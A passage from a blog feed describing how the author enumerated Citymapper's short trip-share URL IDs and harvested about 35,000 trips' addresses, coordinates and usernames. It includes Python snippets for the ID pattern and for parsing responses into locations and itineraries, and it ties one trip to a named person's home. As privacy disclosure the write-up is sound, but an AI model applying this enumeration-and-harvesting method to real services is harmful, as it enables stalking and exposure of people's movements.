Joshua to win in round 6    10/1
Joshua to win in round 7    10/1
Joshua to win in round 8    12/1
Joshua to win in round 9    15/1
Joshua to win in round 10   17/1
Joshua to win in round 11   19/1
Joshua to win in round 12   21/1&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</content:encoded></item><item><title><![CDATA[Online Stalking: London, Paris, New York]]></title><description><![CDATA[Citymapper is a journey planning application that integrates all modes of transport (public, cycling, walking, driving) in major urban areas…]]></description><link>https://dfworks.com/blog/online_stalking_citymapper/</link><guid isPermaLink="false">https://dfworks.com/blog/online_stalking_citymapper/</guid><pubDate>Sun, 18 Feb 2018 12:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Citymapper is a journey planning application that integrates all modes of transport (public, cycling, walking, driving) in major urban areas. Starting in London, Citymapper is now available in New York, Paris and Amsterdam as well as further afield (as you’ll see shortly).&lt;/p&gt;
&lt;p&gt;Citymapper hasn’t disclosed how many users it has. The Google Play store lists between 5 and 10 million downloads; assume the same, if not more, for Apple’s App Store. Given that it is only available in major cities, that suggests a large share of the people in those cities use the application.&lt;/p&gt;
&lt;p&gt;On a personal note, Citymapper is a ‘must-have’ app for anybody living in London, especially for a non-local. Citymapper’s ability to respond to train non-availability, cancellations and tube strikes whilst still delivering a live and accurate route recommendation has certainly saved a few people caught in the rain or running late for job interviews.&lt;/p&gt;
&lt;h2&gt;So, what kind of data does Citymapper have?&lt;/h2&gt;
&lt;p&gt;On any given day, in cities around the world, they know the exact routes of millions of people; they know where people are travelling, when, and even what modes of transport they are taking.&lt;/p&gt;
&lt;p&gt;This information would be hugely valuable to any organisation that operates in one of the world’s major cities… but it could also be used maliciously should any of this data be publicly accessible.&lt;/p&gt;
&lt;p&gt;In October 2015, Citymapper rolled out an update that allowed its users to share routes and arrival times with their friends. Even friends who don’t have the application can view the trip, as it all works through the web browser. Each time a trip is planned on Citymapper, a URL is generated that allows your friends to view your trip on a web page. Below is an example.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/827e96d36b6d93565a378ffb99db712f/75cae/citymapper.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 72.2972972972973%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAOABQDASIAAhEBAxEB/8QAFwAAAwEAAAAAAAAAAAAAAAAAAAEFAv/EABUBAQEAAAAAAAAAAAAAAAAAAAID/9oADAMBAAIQAxAAAAGm9omcMjP/xAAZEAACAwEAAAAAAAAAAAAAAAABAwACEjP/2gAIAQEAAQUCTSpXkRoG0843p//EABYRAQEBAAAAAAAAAAAAAAAAAAABMf/aAAgBAwEBPwGLr//EABYRAAMAAAAAAAAAAAAAAAAAAAABMf/aAAgBAgEBPwFQdP/EABkQAAIDAQAAAAAAAAAAAAAAAAABECExkf/aAAgBAQAGPwJUjFwwU//EABsQAQACAgMAAAAAAAAAAAAAAAEAERAhYZHx/9oACAEBAAE/IVBseJ46GZTrHHUdqf/aAAwDAQACAAMAAAAQJM//xAAXEQEBAQEAAAAAAAAAAAAAAAABABEx/9oACAEDAQE/EAYXS//EABcRAAMBAAAAAAAAAAAAAAAAAAABETH/2gAIAQIBAT8QRQbH/8QAHRABAAMAAgMBAAAAAAAAAAAAAQARQWGxITFR4f/aAAgBAQABPxBQ6x8l3mDBtv5QfU0egZDb3j2waltnEuJ8Op//2Q==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Citymapper&quot;
        title=&quot;Citymapper&quot;
        src=&quot;/static/827e96d36b6d93565a378ffb99db712f/1c72d/citymapper.jpg&quot;
        srcset=&quot;/static/827e96d36b6d93565a378ffb99db712f/a80bd/citymapper.jpg 148w,
/static/827e96d36b6d93565a378ffb99db712f/1c91a/citymapper.jpg 295w,
/static/827e96d36b6d93565a378ffb99db712f/1c72d/citymapper.jpg 590w,
/static/827e96d36b6d93565a378ffb99db712f/a8a14/citymapper.jpg 885w,
/static/827e96d36b6d93565a378ffb99db712f/fbd2c/citymapper.jpg 1180w,
/static/827e96d36b6d93565a378ffb99db712f/75cae/citymapper.jpg 2294w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;As you can see, there isn’t anything hugely compromising, and no personally identifiable information is shown. You have a start location, an end location, a route and some timing information. In this instance, a random inhabitant of London travelled from Tooting to Balham on the Northern Line before getting an Overground train to Battersea, taking 26 minutes in all.&lt;/p&gt;
&lt;p&gt;The eagle-eyed amongst you might see where this is going.&lt;/p&gt;
&lt;p&gt;The URL (&lt;a href=&quot;https://citymapper.com/trip/Tbs6odu&quot;&gt;https://citymapper.com/trip/Tbs6odu&lt;/a&gt;) has a fairly short unique identifier: “Tbs6odu”, 7 characters long and made up of uppercase, lowercase and numeric characters.&lt;/p&gt;
&lt;p&gt;By way of comparison, file-sharing services that generate random URLs often use identifiers of 20 or more characters, drawn from uppercase and lowercase letters, numbers and special characters (e.g. Aj5ye&amp;#x26;hsk8Pq@3Hh%#3Q). These are exponentially harder to brute force.&lt;/p&gt;
&lt;p&gt;Generating 7-character alphanumeric codes with a Python script, and checking whether each was valid by firing an HTTP request at Citymapper, was initially slow going. Even though it is a comparatively short URL ID, there are still ~3 × 10&lt;sup&gt;12&lt;/sup&gt; combinations to get through. That means slow progress if you need to stay below the threshold of Citymapper’s rate limiter. In an hour I had discovered fewer than 10 valid URLs.&lt;/p&gt;
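&lt;p&gt;The size of these search spaces is easy to check. The sketch below compares two identifier formats: 7 alphanumeric characters versus 20 printable ASCII characters. For each, it computes the number of possible IDs and the equivalent entropy in bits. It also estimates how long it would take to try every 7-character ID at an assumed 10 requests per second. The 94-symbol alphabet and the request rate are assumptions for illustration, not measured values.&lt;/p&gt;

```python
import math
import string

ALNUM = string.ascii_letters + string.digits  # 62 symbols
PRINTABLE = ALNUM + string.punctuation        # 94 symbols (assumed alphabet for long share links)


def keyspace(alphabet_size: int, length: int) -> int:
    """Number of distinct IDs of the given length over the alphabet."""
    return alphabet_size ** length


def bits(space: int) -> float:
    """Entropy in bits of a uniformly random ID from the space."""
    return math.log2(space)


def years_to_exhaust(space: int, requests_per_second: float) -> float:
    """Time to try every ID at a fixed request rate, in years."""
    return space / requests_per_second / (365.25 * 24 * 3600)


citymapper = keyspace(len(ALNUM), 7)
share_link = keyspace(len(PRINTABLE), 20)

print(f"7 alphanumeric chars: {citymapper:.2e} IDs, {bits(citymapper):.1f} bits")
print(f"20 printable chars:   {share_link:.2e} IDs, {bits(share_link):.1f} bits")
# Hypothetical rate, kept low to stay under a rate limiter.
print(f"Years to try every 7-char ID at 10 req/s: {years_to_exhaust(citymapper, 10):,.0f}")
```

&lt;p&gt;62&lt;sup&gt;7&lt;/sup&gt; is about 3.5 × 10&lt;sup&gt;12&lt;/sup&gt;, or roughly 42 bits. At that rate, exhaustive search would take over ten thousand years. Random probing only turns up hits because a meaningful number of the IDs are in use.&lt;/p&gt;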
&lt;p&gt;However, there was a pattern!&lt;/p&gt;
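&lt;ul&gt;
&lt;li&gt;T4v8muk&lt;/li&gt;
&lt;li&gt;Tgg5743&lt;/li&gt;
&lt;li&gt;Tbiwmq9&lt;/li&gt;
&lt;li&gt;Tha7v1o&lt;/li&gt;
&lt;li&gt;Tjrdjfp&lt;/li&gt;
&lt;li&gt;Tdgv2zj&lt;/li&gt;
&lt;li&gt;Tjgddh3&lt;/li&gt;
&lt;li&gt;Twdwck3&lt;/li&gt;
&lt;/ul&gt;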
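&lt;p&gt;Each of the URLs began with a capital ‘T’ and used only lowercase letters and digits after the first character. Mathematically, this reduces the number of possible URL combinations from ~3 × 10&lt;sup&gt;12&lt;/sup&gt; (62&lt;sup&gt;7&lt;/sup&gt;) to ~2 × 10&lt;sup&gt;9&lt;/sup&gt; (36&lt;sup&gt;6&lt;/sup&gt;).&lt;/p&gt;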
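&lt;p&gt;The pattern and the resulting reduction can be checked in a few lines. This sketch encodes the observed format as a regular expression: a literal T followed by six lowercase letters or digits. That format is inferred from the samples above, not from any Citymapper documentation. The sketch then compares the two keyspaces.&lt;/p&gt;

```python
import re

# IDs observed in this post.
SAMPLES = ["T4v8muk", "Tgg5743", "Tbiwmq9", "Tha7v1o",
           "Tjrdjfp", "Tdgv2zj", "Tjgddh3", "Twdwck3"]

# Inferred format: a literal "T", then six characters from a-z and 0-9.
PATTERN = re.compile(r"T[a-z0-9]{6}")

assert all(PATTERN.fullmatch(s) for s in SAMPLES)

full = 62 ** 7     # A-Z, a-z, 0-9 in all seven positions
reduced = 36 ** 6  # fixed "T", then a-z, 0-9 in the remaining six
print(f"{full:.2e} -> {reduced:.2e} ({full / reduced:,.0f}x smaller)")
```

&lt;p&gt;The reduced space is roughly 1,600 times smaller than the full 7-character alphanumeric space.&lt;/p&gt;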
&lt;p&gt;With a few tweaks to the Python script, I was able to harvest over 35,000 valid URLs in just a few hours.&lt;/p&gt;
&lt;p&gt;Whilst it was quite fun to browse to each trip individually, and see what the people of the world were up to, I decided to try and visualise all this data. With our list of valid URLs, it was then possible to use API requests to harvest the information available for each of the 35,000 trips.&lt;/p&gt;
&lt;p&gt;Each API response (broadly!) followed this structure:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;{&amp;#39;status&amp;#39;: &amp;#39;arrived&amp;#39;, &amp;#39;last_updated&amp;#39;: &amp;#39;2016-09-15T10:13:09.126014+00:00&amp;#39;, &amp;#39;region_id&amp;#39;: &amp;#39;uk-london&amp;#39;, &amp;#39;endaddress&amp;#39;: &amp;#39;&amp;#39;, &amp;#39;endname&amp;#39;: &amp;#39;&amp;#39;, &amp;#39;message&amp;#39;: &amp;#39;&amp;#39;, &amp;#39;share_type&amp;#39;: &amp;#39;eta&amp;#39;, &amp;#39;title&amp;#39;: None, &amp;#39;eta&amp;#39;: &amp;#39;2016-09-15T10:13:00+00:00&amp;#39;, &amp;#39;startname&amp;#39;: &amp;#39;&amp;#39;, &amp;#39;signature&amp;#39;: &amp;#39;{&amp;quot;duration&amp;quot;: 544, &amp;quot;end&amp;quot;: {&amp;quot;address&amp;quot;: &amp;quot;Tudor Stacks, 1 Dorchester Dr, Herne Hill, London SE24 0DL, UK&amp;quot;, &amp;quot;coords&amp;quot;: &amp;quot;51.458745,-0.096573&amp;quot;, &amp;quot;id&amp;quot;: &amp;quot;google:ChIJhzq09XYEdkgRnJYjDWZtzsA&amp;quot;, &amp;quot;name&amp;quot;: &amp;quot;Tudor Stacks, 1 Dorchester Dr, Herne Hill, London SE24 0DL, UK&amp;quot;, &amp;quot;source&amp;quot;: &amp;quot;3&amp;quot;}, &amp;quot;kind&amp;quot;: &amp;quot;cycle_personal/fastest&amp;quot;, &amp;quot;legs&amp;quot;: [{&amp;quot;distance&amp;quot;: 1694, &amp;quot;duration&amp;quot;: 544, &amp;quot;ec&amp;quot;: &amp;quot;51.458573,-0.096713&amp;quot;, &amp;quot;mode&amp;quot;: &amp;quot;cycle&amp;quot;, &amp;quot;sc&amp;quot;: &amp;quot;51.468142,-0.095144&amp;quot;}], &amp;quot;region&amp;quot;: &amp;quot;uk-london&amp;quot;, &amp;quot;start&amp;quot;: {&amp;quot;address&amp;quot;: &amp;quot;Bessemer Road&amp;quot;, &amp;quot;coords&amp;quot;: &amp;quot;51.468135,-0.095137&amp;quot;, &amp;quot;source&amp;quot;: &amp;quot;1&amp;quot;}, &amp;quot;time&amp;quot;: &amp;quot;2016-09-15T11:01:44+01:00/NOWISH&amp;quot;, &amp;quot;version&amp;quot;: 2}&amp;#39;, 
&amp;#39;startaddress&amp;#39;: &amp;#39;&amp;#39;, &amp;#39;coords&amp;#39;: [51.458855, -0.096722]}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;As you can see above, it is possible to harvest, en masse, the start and end points of journeys, addresses, modes of transport and lat/long coordinates.&lt;/p&gt;
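&lt;p&gt;Pulling those fields out of each response is mostly a matter of decoding the nested signature field. In the sample above, that field is itself a JSON-encoded string. The sketch below assumes each response has already been loaded into a Python dict, as in the printout above, and uses a trimmed copy of that sample. The function names and the choice of fields are my own. It also accepts responses where signature is already an object.&lt;/p&gt;

```python
import json

# Trimmed copy of the sample response above; "signature" is a JSON-encoded string.
response = {
    "status": "arrived",
    "region_id": "uk-london",
    "share_type": "eta",
    "signature": '{"duration": 544, "kind": "cycle_personal/fastest", '
                 '"start": {"address": "Bessemer Road", "coords": "51.468135,-0.095137"}, '
                 '"end": {"address": "Tudor Stacks, 1 Dorchester Dr, Herne Hill, London SE24 0DL, UK", '
                 '"coords": "51.458745,-0.096573"}, '
                 '"legs": [{"distance": 1694, "duration": 544, "mode": "cycle"}]}',
}


def parse_coords(text: str) -> tuple:
    """Turn a 'lat,long' string into a (lat, long) tuple of floats."""
    lat, lon = text.split(",")
    return float(lat), float(lon)


def extract_trip(resp: dict) -> dict:
    """Pull the start/end points, addresses and travel modes out of one response."""
    sig = resp.get("signature", {})
    if isinstance(sig, str):  # decode when the signature arrives as a JSON string
        sig = json.loads(sig)
    start, end = sig.get("start", {}), sig.get("end", {})
    return {
        "region": resp.get("region_id"),
        "start_address": start.get("address", ""),
        "start": parse_coords(start["coords"]) if "coords" in start else None,
        "end_address": end.get("address", ""),
        "end": parse_coords(end["coords"]) if "coords" in end else None,
        "modes": [leg.get("mode") for leg in sig.get("legs", [])],
        "duration_s": sig.get("duration"),
    }


print(extract_trip(response))
```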
&lt;p&gt;Plotting all the lat/long coordinates generates the following maps. (For any non-GIS aficionados, the easiest way I found to accomplish this was using Google Fusion Tables; a tutorial can be found here: &lt;a href=&quot;https://support.google.com/fusiontables/answer/2571232&quot;&gt;https://support.google.com/fusiontables/answer/2571232&lt;/a&gt;.)&lt;/p&gt;
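&lt;p&gt;Google has since shut down Fusion Tables (in 2019). As an alternative, the extracted coordinates can be written out as GeoJSON, which desktop GIS tools such as QGIS can load directly. This is a minimal sketch, assuming each point has already been extracted as a (lat, long) tuple. Note that GeoJSON expects positions in [longitude, latitude] order.&lt;/p&gt;

```python
import json


def to_geojson(points, properties=None):
    """Build a GeoJSON FeatureCollection from a list of (lat, long) tuples.

    GeoJSON positions are [longitude, latitude], the reverse of the
    "lat,long" order used in the API responses.
    """
    properties = properties or [{} for _ in points]
    features = [
        {
            "type": "Feature",
            "geometry": {"type": "Point", "coordinates": [lon, lat]},
            "properties": props,
        }
        for (lat, lon), props in zip(points, properties)
    ]
    return {"type": "FeatureCollection", "features": features}


# Start and end points from the first sample response.
points = [(51.468135, -0.095137), (51.458745, -0.096573)]
labels = [{"kind": "start"}, {"kind": "end"}]
print(json.dumps(to_geojson(points, labels), indent=2))
```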
&lt;p&gt;The World:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/ff6ca1ffd22555b046595902f617cfa0/84855/world.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 45.94594594594595%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAJABQDASIAAhEBAxEB/8QAFwABAQEBAAAAAAAAAAAAAAAAAAECBf/EABYBAQEBAAAAAAAAAAAAAAAAAAMAAf/aAAwDAQACEAMQAAAB6aEOstv/xAAXEAADAQAAAAAAAAAAAAAAAAAAESAx/9oACAEBAAEFAmYOP//EABURAQEAAAAAAAAAAAAAAAAAABAR/9oACAEDAQE/Aaf/xAAVEQEBAAAAAAAAAAAAAAAAAAAQEv/aAAgBAgEBPwGT/8QAFBABAAAAAAAAAAAAAAAAAAAAIP/aAAgBAQAGPwJf/8QAGBABAAMBAAAAAAAAAAAAAAAAAQARIEH/2gAIAQEAAT8htCulisf/2gAMAwEAAgADAAAAEEjP/8QAFREBAQAAAAAAAAAAAAAAAAAAACH/2gAIAQMBAT8QhX//xAAXEQEBAQEAAAAAAAAAAAAAAAABACER/9oACAECAQE/EEOQBnL/xAAcEAEAAgIDAQAAAAAAAAAAAAABABEhQRBhcYH/2gAIAQEAAT8QKaHN3cYLkfKgXKnUN+cbZ//Z&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;World&quot;
        title=&quot;World&quot;
        src=&quot;/static/ff6ca1ffd22555b046595902f617cfa0/1c72d/world.jpg&quot;
        srcset=&quot;/static/ff6ca1ffd22555b046595902f617cfa0/a80bd/world.jpg 148w,
/static/ff6ca1ffd22555b046595902f617cfa0/1c91a/world.jpg 295w,
/static/ff6ca1ffd22555b046595902f617cfa0/1c72d/world.jpg 590w,
/static/ff6ca1ffd22555b046595902f617cfa0/a8a14/world.jpg 885w,
/static/ff6ca1ffd22555b046595902f617cfa0/fbd2c/world.jpg 1180w,
/static/ff6ca1ffd22555b046595902f617cfa0/84855/world.jpg 1678w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;London:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/9efbec31fddcc42db7525c65d4493250/69e09/london.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 87.16216216216216%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAARABQDASIAAhEBAxEB/8QAGAABAQEBAQAAAAAAAAAAAAAAAAECAwX/xAAWAQEBAQAAAAAAAAAAAAAAAAACAAP/2gAMAwEAAhADEAAAAfUz1wYNhIIwV//EABsQAAIDAAMAAAAAAAAAAAAAAAABAgMREBIx/9oACAEBAAEFApz6qu5WLT0SUTR8/wD/xAAUEQEAAAAAAAAAAAAAAAAAAAAg/9oACAEDAQE/AR//xAAWEQADAAAAAAAAAAAAAAAAAAAAEIH/2gAIAQIBAT8BI//EABoQAAICAwAAAAAAAAAAAAAAAAARASEQIDH/2gAIAQEABj8CY4xZRzT/xAAdEAACAQQDAAAAAAAAAAAAAAAAAREgITFRYYGh/9oACAEBAAE/IbQXZNDzA3mw4SMORdYknoho6P8A/9oADAMBAAIAAwAAABAcwEP/xAAYEQADAQEAAAAAAAAAAAAAAAAAAREQYf/aAAgBAwEBPxCqF6PP/8QAGBEBAQADAAAAAAAAAAAAAAAAAQAQIUH/2gAIAQIBAT8QHcEOY//EAB0QAQACAgIDAAAAAAAAAAAAAAEAESExQXFRYbH/2gAIAQEAAT8QR9SrG/cU4d03SGZKPsDwt7oIxNbl3iX1ElAXl5nLuckdz//Z&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;London&quot;
        title=&quot;London&quot;
        src=&quot;/static/9efbec31fddcc42db7525c65d4493250/1c72d/london.jpg&quot;
        srcset=&quot;/static/9efbec31fddcc42db7525c65d4493250/a80bd/london.jpg 148w,
/static/9efbec31fddcc42db7525c65d4493250/1c91a/london.jpg 295w,
/static/9efbec31fddcc42db7525c65d4493250/1c72d/london.jpg 590w,
/static/9efbec31fddcc42db7525c65d4493250/a8a14/london.jpg 885w,
/static/9efbec31fddcc42db7525c65d4493250/69e09/london.jpg 1107w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;However, not all API responses were created equal. Out of the ~35,000 API responses there were &lt;strong&gt;1,706 usernames, 3,623 locations tagged as ‘home’ and 1,009 locations tagged as ‘work’&lt;/strong&gt;. Combined with some OSINT research, we can start to attribute trips to ‘real people’. Take the following API response (anonymised with x’s where appropriate):&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;{
   &amp;quot;status&amp;quot;:&amp;quot;expired&amp;quot;,
   &amp;quot;last_updated&amp;quot;:&amp;quot;2017-04-04T19:33:55+00:00&amp;quot;,
   &amp;quot;region_id&amp;quot;:&amp;quot;uk-london&amp;quot;,
   &amp;quot;endaddress&amp;quot;:&amp;quot;&amp;quot;,
   &amp;quot;endname&amp;quot;:&amp;quot;&amp;quot;,
   &amp;quot;message&amp;quot;:&amp;quot;&amp;quot;,
   &amp;quot;share_type&amp;quot;:&amp;quot;eta&amp;quot;,
   &amp;quot;title&amp;quot;:&amp;quot;None&amp;quot;,
   &amp;quot;eta&amp;quot;:&amp;quot;2017-04-04T20:27:00+00:00&amp;quot;,
   &amp;quot;startname&amp;quot;:&amp;quot;&amp;quot;,
   &amp;quot;signature&amp;quot;:{
      &amp;quot;car&amp;quot;:18701,
      &amp;quot;duration&amp;quot;:3759,
      &amp;quot;end&amp;quot;:{
         &amp;quot;address&amp;quot;:&amp;quot;XXXXX, XXXXX, London E17 XXX, UK&amp;quot;,
         &amp;quot;coords&amp;quot;:&amp;quot;51.5XXXX,-0.0XXXXX&amp;quot;,
         &amp;quot;name&amp;quot;:&amp;quot;Home&amp;quot;,
         &amp;quot;source&amp;quot;:&amp;quot;5&amp;quot;
      },
      &amp;quot;legs&amp;quot;:[
         {
            &amp;quot;distance&amp;quot;:391,
            &amp;quot;duration&amp;quot;:346,
            &amp;quot;ec&amp;quot;:&amp;quot;51.4XXXX,-0.1XXXX&amp;quot;,
            &amp;quot;in_station&amp;quot;:&amp;quot;0/60&amp;quot;,
            &amp;quot;mode&amp;quot;:&amp;quot;walk&amp;quot;,
            &amp;quot;sc&amp;quot;:&amp;quot;51.XXXXX,-0.1XXXXX&amp;quot;
         },
         {
            &amp;quot;end&amp;quot;:&amp;quot;Victoria&amp;quot;,
            &amp;quot;mode&amp;quot;:&amp;quot;transit&amp;quot;,
            &amp;quot;route_ids&amp;quot;:[
            &amp;quot;NationalRailSN&amp;quot;
            ],
            &amp;quot;start&amp;quot;:&amp;quot;BatterseaPark&amp;quot;,
            &amp;quot;stop_count&amp;quot;:2,
            &amp;quot;stop_ids&amp;quot;:[
            &amp;quot;Platform_BatterseaPark_NationalRail&amp;quot;,
            &amp;quot;Platform_Victoria_BGeS&amp;quot;
            ]
         },
         {
            &amp;quot;distance&amp;quot;:0,
            &amp;quot;duration&amp;quot;:330,
            &amp;quot;ec&amp;quot;:&amp;quot;51.4XXXX,-0.1XXXXX&amp;quot;,
            &amp;quot;in_station&amp;quot;:&amp;quot;1/330&amp;quot;,
            &amp;quot;mode&amp;quot;:&amp;quot;walk&amp;quot;,
            &amp;quot;sc&amp;quot;:&amp;quot;51.4XXXXX,-0.1XXXXX&amp;quot;
         },
         {
            &amp;quot;end&amp;quot;:&amp;quot;WalthamstowCentral&amp;quot;,
            &amp;quot;mode&amp;quot;:&amp;quot;transit&amp;quot;,
            &amp;quot;route_ids&amp;quot;:[
            &amp;quot;Victoria&amp;quot;
            ],
            &amp;quot;start&amp;quot;:&amp;quot;Victoria&amp;quot;,
            &amp;quot;stop_count&amp;quot;:12,
            &amp;quot;stop_ids&amp;quot;:[
            &amp;quot;Platform_Victoria_V_dN&amp;quot;,
            &amp;quot;Platform_WalthamstowCentral_Underground&amp;quot;
            ]
         },
         {
            &amp;quot;distance&amp;quot;:1349,
            &amp;quot;duration&amp;quot;:1205,
            &amp;quot;ec&amp;quot;:&amp;quot;51.5XXXXX,-0.0XXXXX&amp;quot;,
            &amp;quot;from_exit&amp;quot;:&amp;quot;WalthamstowCentral_E2903&amp;quot;,
            &amp;quot;in_station&amp;quot;:&amp;quot;2/120&amp;quot;,
            &amp;quot;mode&amp;quot;:&amp;quot;walk&amp;quot;,
            &amp;quot;sc&amp;quot;:&amp;quot;51.5XXXX,-0.0XXXXX4&amp;quot;
         }
      ],
      &amp;quot;price_pence&amp;quot;:390,
      &amp;quot;region&amp;quot;:&amp;quot;uk-london&amp;quot;,
      &amp;quot;routing_request_id&amp;quot;:&amp;quot;02ffc71d-daa5-4828-bea3-a31adf3c3c6e&amp;quot;,
      &amp;quot;start&amp;quot;:{
         &amp;quot;coords&amp;quot;:&amp;quot;51.4XXXXX,-0.1XXXX&amp;quot;,
         &amp;quot;source&amp;quot;:&amp;quot;1&amp;quot;
      },
      &amp;quot;time&amp;quot;:&amp;quot;2017-04-04T20:29:04+01:00/NOWISH&amp;quot;,
      &amp;quot;version&amp;quot;:2
   },
   &amp;quot;startaddress&amp;quot;:&amp;quot;&amp;quot;,
   &amp;quot;coords&amp;quot;:[
     51.4XXXX,
     -0.1XXXX
   ],
   &amp;quot;user_name&amp;quot;:&amp;quot;Chris&amp;quot;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
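&lt;p&gt;As you can see, on 04 Apr 2017 Chris took a journey at around 19:30 UTC (20:30 local time) from Battersea to his home address in E17. He walked to Battersea Park station and took a National Rail (Southern) train two stops to Victoria. From there he rode the Victoria line to Walthamstow Central before walking the rest of the way home.&lt;/p&gt;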
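&lt;p&gt;The route can be read straight off the ordered legs array. The sketch below uses an abridged copy of Chris’s response, with coordinates omitted, and turns the legs into a readable itinerary. It skips zero-distance in-station walks. It also converts the trip’s start time, which is recorded in local time with a +01:00 offset, to UTC. The helper names are hypothetical.&lt;/p&gt;

```python
from datetime import datetime, timezone

# Abridged copy of the response above (coordinates and station exits omitted).
response = {
    "user_name": "Chris",
    "signature": {
        "end": {"name": "Home"},
        "time": "2017-04-04T20:29:04+01:00/NOWISH",
        "legs": [
            {"mode": "walk", "distance": 391, "duration": 346},
            {"mode": "transit", "start": "BatterseaPark", "end": "Victoria",
             "route_ids": ["NationalRailSN"], "stop_count": 2},
            {"mode": "walk", "distance": 0, "duration": 330},
            {"mode": "transit", "start": "Victoria", "end": "WalthamstowCentral",
             "route_ids": ["Victoria"], "stop_count": 12},
            {"mode": "walk", "distance": 1349, "duration": 1205},
        ],
    },
}


def itinerary(resp: dict) -> list:
    """Human-readable steps from the ordered legs of a trip."""
    steps = []
    for leg in resp["signature"].get("legs", []):
        if leg.get("mode") == "transit":
            route = ", ".join(leg.get("route_ids", []))
            steps.append(f"{route}: {leg['start']} to {leg['end']} ({leg['stop_count']} stops)")
        elif leg.get("distance"):  # skip zero-distance interchange walks
            steps.append(f"{leg['mode']} {leg['distance']} m")
    return steps


def start_time_utc(resp: dict) -> datetime:
    """Parse the local start time (dropping the '/NOWISH' suffix) and convert to UTC."""
    raw = resp["signature"]["time"].split("/")[0]
    return datetime.fromisoformat(raw).astimezone(timezone.utc)


who = response.get("user_name", "unknown")
destination = response["signature"]["end"].get("name", "unlabelled")
print(f"{who} -> {destination}, starting {start_time_utc(response):%Y-%m-%d %H:%M} UTC")
for step in itinerary(response):
    print(" ", step)
```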
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/fc71083eff08a284bfccc60cd32be03f/10fd8/route.jpg&quot;
    style=&quot;display: block&quot;
